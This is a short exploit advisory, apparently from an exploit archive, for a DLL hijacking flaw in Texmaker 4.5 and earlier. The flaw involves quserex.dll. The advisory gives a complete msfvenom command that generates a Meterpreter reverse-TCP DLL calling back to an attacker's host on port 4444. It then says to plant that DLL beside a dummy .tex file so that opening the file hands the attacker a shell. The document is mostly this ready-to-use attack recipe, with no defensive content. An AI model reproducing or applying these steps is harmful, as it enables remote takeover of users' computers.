Texmaker versions 4.5 and below suffer from a DLL hijacking vulnerability.
47714de2b7630206971789250b9ed519dc9482713b067b84b1018301186df84f
# Exploit Title: TEXMAKER DLL HIJACKING VULNERABILTY
# Date: FEB 14 2016
# Exploit Author: SHANTANU KHANDELWAL
# Vendor Homepage: https://www.xm1math.net
# Software Link: https://www.xm1math.net/texmaker/texmakerwin32_install.exe
<https://www.winhex.com/winhex.zip>
# Version: <= 4.5
# Tested on: WINDOWS XP 32 bit , Windows 8
TEXMAKER suffers DLL HIJACK Vulnerability from file type .tex
Vulnerable DLL: quserex.dll
Make Malicious dll :
msfvenom -p windows/meterpreter/reverse_tcp -a x86 -f dll LHOST=<HOST IP>
LPORT=4444 > quserex.dll
Exploit:
Place a dummy .tex file with the malicious dll . When the file is opened in
texmaker editor you will get shell